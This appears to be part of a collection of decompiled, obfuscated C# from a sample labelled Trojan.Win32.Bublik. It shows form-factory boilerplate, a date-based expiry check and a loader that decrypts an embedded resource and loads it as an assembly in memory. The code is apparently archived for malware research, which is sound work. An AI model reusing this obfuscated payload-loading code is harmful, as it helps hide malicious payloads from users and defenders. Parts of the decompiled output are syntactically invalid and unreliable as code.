private static c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a> c36a0c1af97c708258e8cb849995781ef = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a>();
private static readonly c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d> c0f36fee1efd7b3eb9887972f47819e10 = new c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d>();
[DebuggerNonUserCode]
static c9b81fdde8dea987fa347362a8b38f66c()
{
}
[HelpKeyword("My.Computer")]
internal static c989fcefb2025a0c5c08fe9654b0238e2 c92084a87c43349b13fd08cd6aff01d8f
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c6d6861147410be7d3c02208cc91f920b.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.Application")]
internal static c1a978f6ad601a840a4c556c463434740 c8b84d0974b93f773bcc7dafeea38d1e0
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.cf1913bd55cb878b4fcc66db187333603.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.User")]
internal static User cd013fa95fd181d2291a68072d23b2631
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c5882d9714618e820b0e232605fa4e6a8.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.Forms")]
internal static c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a c0d14e620a03587bae92914b08d618907
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c36a0c1af97c708258e8cb849995781ef.ca3164a95c498711c0a73564c28375492;
}
[HelpKeyword("My.WebServices")]
internal static c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d cbbd6ff9682fa668906b1351d071467e4
{
[DebuggerHidden] get => c9b81fdde8dea987fa347362a8b38f66c.c0f36fee1efd7b3eb9887972f47819e10.ca3164a95c498711c0a73564c28375492;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class c02bb07968f48c37cae62c1da6810da6a
{
public Form1 cdb3f6ca4676597579d53d54a0d21304d;
[ThreadStatic]
private static Hashtable cc1f27d60b4baa0a608e20f5e465dfa47;
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public c02bb07968f48c37cae62c1da6810da6a()
{
}
public Form1 cf7c417efd3c27564c3ec7f3ff8a83d6a
{
[DebuggerNonUserCode] get
{
this.cdb3f6ca4676597579d53d54a0d21304d = c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.c34d836302883eefe8a38163efc65e0ad<Form1>(this.cdb3f6ca4676597579d53d54a0d21304d);
return this.cdb3f6ca4676597579d53d54a0d21304d;
}
[DebuggerNonUserCode] set
{
if (value == this.cdb3f6ca4676597579d53d54a0d21304d)
{
label_1:
switch (4)
{
case 0:
goto label_1;
default:
if (true)
break;
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.set_cf7c417efd3c27564c3ec7f3ff8a83d6a);
break;
}
}
else
{
if (value != null)
throw new ArgumentException(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(1));
this.cbb6da2598d8d80eb52e2d7caa80c7635<Form1>(ref this.cdb3f6ca4676597579d53d54a0d21304d);
}
}
}
[DebuggerHidden]
private static cd27155a99d37e18e8674d966126bfe7d c34d836302883eefe8a38163efc65e0ad<cd27155a99d37e18e8674d966126bfe7d>(
cd27155a99d37e18e8674d966126bfe7d ca56b1019bad311f5bf842dffe5f80e96)
where cd27155a99d37e18e8674d966126bfe7d : Form, new()
{
if ((object) ca56b1019bad311f5bf842dffe5f80e96 != null)
{
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.c34d836302883eefe8a38163efc65e0ad);
}
if (!ca56b1019bad311f5bf842dffe5f80e96.IsDisposed)
return ca56b1019bad311f5bf842dffe5f80e96;
label_5:
switch (1)
{
case 0:
goto label_5;
}
break;
}
}
if (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47 != null)
{
label_7:
switch (5)
{
case 0:
goto label_7;
default:
if (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.ContainsKey((object) typeof (cd27155a99d37e18e8674d966126bfe7d)))
{
label_9:
switch (2)
{
case 0:
goto label_9;
default:
throw new InvalidOperationException(Utils.GetResourceString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(72)));
}
}
else
break;
}
}
else
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47 = new Hashtable();
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.Add((object) typeof (cd27155a99d37e18e8674d966126bfe7d), (object) null);
try
{
return new cd27155a99d37e18e8674d966126bfe7d();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
int num = ex.InnerException != null ? 1 : 0;
if (num != 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(129), ex.InnerException.Message), ex.InnerException);
}
finally
{
c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a.cc1f27d60b4baa0a608e20f5e465dfa47.Remove((object) typeof (cd27155a99d37e18e8674d966126bfe7d));
}
}
[DebuggerHidden]
private void cbb6da2598d8d80eb52e2d7caa80c7635<cd27155a99d37e18e8674d966126bfe7d>(
ref cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
where cd27155a99d37e18e8674d966126bfe7d : Form
{
c6ac98bb3a5ad66bccc6228eddd2a459e.Dispose();
c6ac98bb3a5ad66bccc6228eddd2a459e = default (cd27155a99d37e18e8674d966126bfe7d);
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type c45a762006a58631502e7d80a1fa57803() => typeof (c9b81fdde8dea987fa347362a8b38f66c.c02bb07968f48c37cae62c1da6810da6a);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ca60e2e08a2723dd3c979d21ff53a885d
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ca60e2e08a2723dd3c979d21ff53a885d()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type c45a762006a58631502e7d80a1fa57803() => typeof (c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static cd27155a99d37e18e8674d966126bfe7d c34d836302883eefe8a38163efc65e0ad<cd27155a99d37e18e8674d966126bfe7d>(
cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
where cd27155a99d37e18e8674d966126bfe7d : new()
{
if ((object) c6ac98bb3a5ad66bccc6228eddd2a459e != null)
return c6ac98bb3a5ad66bccc6228eddd2a459e;
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.ca60e2e08a2723dd3c979d21ff53a885d.c34d836302883eefe8a38163efc65e0ad);
}
return new cd27155a99d37e18e8674d966126bfe7d();
}
}
[DebuggerHidden]
private void cbb6da2598d8d80eb52e2d7caa80c7635<cd27155a99d37e18e8674d966126bfe7d>(
ref cd27155a99d37e18e8674d966126bfe7d c6ac98bb3a5ad66bccc6228eddd2a459e)
{
c6ac98bb3a5ad66bccc6228eddd2a459e = default (cd27155a99d37e18e8674d966126bfe7d);
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d> where cd27155a99d37e18e8674d966126bfe7d : new()
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public c5c7ec5333224c1213f04f873fa326520()
{
}
internal cd27155a99d37e18e8674d966126bfe7d ca3164a95c498711c0a73564c28375492
{
[DebuggerHidden] get
{
if ((object) c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529 == null)
{
label_1:
switch (4)
{
case 0:
goto label_1;
default:
if (false)
{
RuntimeMethodHandle runtimeMethodHandle = __methodref (c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<>.get_ca3164a95c498711c0a73564c28375492);
}
c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529 = new cd27155a99d37e18e8674d966126bfe7d();
break;
}
}
return c9b81fdde8dea987fa347362a8b38f66c.c5c7ec5333224c1213f04f873fa326520<cd27155a99d37e18e8674d966126bfe7d>.c2b01df8981e297847f68891fa241d529;
}
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/cb172a3cf4de66a26f276fa336a900f40.cs
+34
View File
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: A.cb172a3cf4de66a26f276fa336a900f40
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class cb172a3cf4de66a26f276fa336a900f40
{
internal static void c8a7fc1893bd951199feb87a0595012ad()
{
DateTime dateTime = new DateTime(long.Parse(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(231)));
if (!(DateTime.Now > dateTime))
return;
label_1:
switch (6)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (cb172a3cf4de66a26f276fa336a900f40.c8a7fc1893bd951199feb87a0595012ad);
}
throw new Exception(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(268) + Assembly.GetExecutingAssembly().GetName().Name + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(299) + dateTime.ToString(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(471)) + c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(494));
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/cc67fcb12c7ab50e974a357101bdbe09d.cs
+25
View File
@@ -0,0 +1,25 @@
// Decompiled with JetBrains decompiler
// Type: A.cc67fcb12c7ab50e974a357101bdbe09d
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Club.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace A
{
[DebuggerNonUserCode]
[StandardModule]
[CompilerGenerated]
[HideModuleName]
internal sealed class cc67fcb12c7ab50e974a357101bdbe09d
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/ced138b6eee8b5fea3f196334f6720805.cs
+94
View File
@@ -0,0 +1,94 @@
// Decompiled with JetBrains decompiler
// Type: A.ced138b6eee8b5fea3f196334f6720805
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class ced138b6eee8b5fea3f196334f6720805
{
private static readonly Assembly c7956d9417023ac40f6a0eb5665bf366c;
static ced138b6eee8b5fea3f196334f6720805()
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c != null)
return;
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.\u002Ecctor);
}
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string name = executingAssembly.GetName().Name;
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (name == manifestResourceName)
{
label_6:
switch (3)
{
case 0:
goto label_6;
default:
ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c = Assembly.Load(c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c(executingAssembly.GetManifestResourceStream(name)));
return;
}
}
}
label_10:
switch (7)
{
case 0:
goto label_10;
default:
return;
}
}
}
internal static void c496a7d7e6524413c65d8aa7379640bb1() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
private static Assembly c3e00543c0030da506a3c9417db159586(
object c932adab82a8e17f3df4be69b90bf6c46,
ResolveEventArgs c40515e8f64a790a3f5078c209ce553e3)
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c == null)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
label_1:
switch (7)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
}
foreach (string manifestResourceName in ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c.GetManifestResourceNames())
{
if (manifestResourceName == c40515e8f64a790a3f5078c209ce553e3.Name)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
}
label_9:
switch (4)
{
case 0:
goto label_9;
default:
return (Assembly) null;
}
}
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/cfd7a845189f70212b2f34a945b41994e.cs
+61
View File
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: A.cfd7a845189f70212b2f34a945b41994e
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace A
{
[HideModuleName]
[CompilerGenerated]
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[DebuggerNonUserCode]
internal sealed class cfd7a845189f70212b2f34a945b41994e
{
private static ResourceManager c3447dff4f91dc625360969fe10241192;
private static CultureInfo c62aab94b28f8800816ce1c0e53e796ba;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192, (object) null))
{
label_1:
switch (7)
{
case 0:
goto label_1;
default:
if (false)
{
RuntimeMethodHandle runtimeMethodHandle = __methodref (cfd7a845189f70212b2f34a945b41994e.get_ResourceManager);
}
cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192 = new ResourceManager(c0101fd8803cfd89ecc47c2ee5ea3536d.c63a0ab0f5643f828f13c6bbd6a2b539a(202), typeof (cfd7a845189f70212b2f34a945b41994e).Assembly);
break;
}
}
return cfd7a845189f70212b2f34a945b41994e.c3447dff4f91dc625360969fe10241192;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => cfd7a845189f70212b2f34a945b41994e.c62aab94b28f8800816ce1c0e53e796ba;
set => cfd7a845189f70212b2f34a945b41994e.c62aab94b28f8800816ce1c0e53e796ba = value;
}
}
}